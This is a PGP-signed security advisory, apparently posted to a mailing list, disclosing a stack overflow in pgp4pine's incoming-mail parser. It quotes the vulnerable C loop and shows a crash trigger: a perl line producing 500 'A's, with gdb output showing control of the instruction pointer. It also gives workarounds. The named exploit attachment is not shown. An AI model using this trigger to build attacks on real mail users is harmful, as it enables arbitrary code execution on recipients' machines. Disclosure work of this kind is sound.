pgp4pine stack overflow vulnerability

[Eric AUGE <eric.auge () cw com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Following informations:

I Background:
  pgp4pine is a mail encryption/decryption/signature/verification wrapper
  to gpg for pine, it is called from pine to parse mail body and get PGP
  information from the file.

  more information : http://pgp4pine.flatline.de/

II Problem description:
  When installed/configured within pine, pgp4pine parse any incoming mail
  before reading (in the default standard configuration) looking for
  PGP tokens & informations to do his sender's signature verifications.
  To verify incoming mail it calls :
  menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);
  and read each line according to this loop :

 [...]
 char readline[CONSOLE_IO_LINE_LENGTH];
 (where defines.h:#define CONSOLE_IO_LINE_LENGTH 256)
 [...]
 do {
   fertig=0;
   while (!fertig)
   {
     if ((c=getc(fin))==EOF)
     {
       outFile=inFile; /* this usually is not
                          executed, EOF breaks directly */
       return;
     }
     else if ((readline[i++]=c) == '\n')
     {
       readline[i]='\0';
       fertig=1;
     }
   }
   fertig=0;

   if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0)
   {
     /* got signed message */
     fclose(fin);
     while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
     fertig=1;
   }
   else if (strncmp("-----BEGIN PGP",readline,14)==0)
   {
     /* got another type of PGP message (encrypted, keys ...) */
     fclose(fin);
     fileDecrypt(inFile,outFile);
     waitForReturn();
     fertig=1;
   }
   else
     i=0; /* Got waste line, reset i */
 } while (!fertig);
 [...]

If a single line go over 256 chars directly to EOF,
it will overwrite saved environnement on the stack and return,
since there is no check on the index 'i' within the readline[] array,

     [...]
     }
     else if ((readline[i++]=c) == '\n')
     {
     [...]

you can can go over CONSOLE_IO_LINE_LENGTH and replace necessary
saved registers before hiting one condition to return.

     [...]
     if ((c=getc(fin))==EOF)
     {
       outFile=inFile; /* this usually is not
                          executed, EOF breaks directly */
       return;
     }
     [...]

then try:

rival@bones ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
rival@bones ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
[...]
Segmentation fault (core dumped)
rival@bones ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
[...]
Core was generated by `./pgp4pine-vuln -d -i testmail'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()
(gdb)

Here it is ;)

III Impact
  Since pgp4pine process any incoming email, sending special crafted email
  can make sender execute arbitrary code on the recipient box when the
  mail is opened.

IV Workaround/Solutions

  Deactivate pgp4pine and use another pgp wrapper for pine :
  http://pgpenvelope.sourceforge.net/
  http://www.megaloman.com/~hany/software/pinepgp/stable.html
  or any other...

  author holger () flatline de has been contacted since 01/2003
  no reply since :/

V Proof of concept
  Attached proof of concept code, for any informations read the source.

Best Regards,

- ---
Eric AUGE.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)

iD8DBQE+b1fGL/U5psk9l1gRAr1RAJ4pnFriwS073R3fEcGp+1nMF4Q58gCfdLAK
3aY03iuZQPfonSiyaqa5/Co=
=zirR
-----END PGP SIGNATURE-----

Attachment: mailex-gen.c
Description: mailex-gen.c